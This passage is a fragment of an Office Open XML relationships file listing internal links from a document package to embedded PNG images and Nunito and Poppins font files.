Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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ExtraLight-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NunitoExtraLight-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NunitoExtraLight-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NunitoExtraLight-boldItalic.ttf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-regular.ttf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-bold.ttf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-italic.ttf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppi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